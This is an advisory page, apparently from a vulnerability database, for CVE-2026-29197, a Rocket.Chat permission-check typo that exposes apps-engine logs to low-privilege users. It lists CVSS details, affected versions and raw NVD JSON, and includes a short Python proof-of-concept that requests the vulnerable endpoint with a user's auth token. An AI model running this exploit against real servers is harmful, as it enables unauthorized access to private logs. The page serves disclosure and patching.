Security Vulnerability Report
中文
CVE-2026-29197 CVSS 4.3 MEDIUM

CVE-2026-29197

Published: 2026-04-24 00:16:28
Last Modified: 2026-04-28 19:34:33

Description

In versions <8.4.0, <8.3.2, <8.2.2, <8.1.3, <8.0.4, <7.13.6, <7.12.7, <7.11.7, and <7.10.10, the endpoints /api/apps/logs and /api/apps/:id/logs have a typo in the required permission check, allowing authenticated users without the proper permissions to read apps-engine logs.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* - VULNERABLE
Rocket.Chat < 8.4.0
Rocket.Chat < 8.3.2
Rocket.Chat < 8.2.2
Rocket.Chat < 8.1.3
Rocket.Chat < 8.0.4
Rocket.Chat < 7.13.6
Rocket.Chat < 7.12.7
Rocket.Chat < 7.11.7
Rocket.Chat < 7.10.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL # Replace with actual target host target_url = "https://<target-domain>/api/apps/logs" # Auth token (X-Auth-Token) and User ID (X-User-Id) required # Obtain these after logging in with a low-privilege user headers = { "X-Auth-Token": "<your-auth-token>", "X-User-Id": "<your-user-id>", "Content-Type": "application/json" } try: # Send GET request to the vulnerable endpoint response = requests.get(target_url, headers=headers, verify=False) if response.status_code == 200: print("[+] Exploit Successful! Logs retrieved:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29197", "sourceIdentifier": "[email protected]", "published": "2026-04-24T00:16:27.647", "lastModified": "2026-04-28T19:34:33.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In versions <8.4.0, <8.3.2, <8.2.2, <8.1.3, <8.0.4, <7.13.6, <7.12.7, <7.11.7, and <7.10.10, the endpoints /api/apps/logs and /api/apps/:id/logs have a typo in the required permission check, allowing authenticated users without the proper permissions to read apps-engine logs."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.10.0", "versionEndExcluding": "7.10.10", "matchCriteriaId": "1F9F2F06-FC98-4692-BD3A-5AF9D746FB64"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.11.0", "versionEndExcluding": "7.11.7", "matchCriteriaId": "520910F2-3548-47A9-AD85-286C6703C8BA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.12.0", "versionEndExcluding": "7.12.7", "matchCriteriaId": "14F6F674-A51D-492B-B535-D3909E152C36"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.0", "versionEndExcluding": "7.13.6", "matchCriteriaId": "2E3EA77B-C132-4750-97B8-6B059E1B303E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.4", "matchCriteriaId": "2FA25A81-737A-4B52-992B-B8201F046A4F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.1.0", "versionEndExcluding": "8.1.3", "matchCriteriaId": "9C9716BA-F120-488F-A94B-9393C9A2BBE1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.2.0", "versionEndExcluding": "8.2.2", "matchCriteriaId": "9AF83D66-35A3-47CB-B776-473830D0CFDA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.0", "versionEndExcluding": "8.3.2", "matchCriteriaId": "16973449-C9F2-4E71-A840-69EEFF8DC6D7"}]}]}], "references": [{"url": "https://github.com/RocketChat/Rocket.Chat/pull/40125", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://hackerone.com/reports/3589551", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}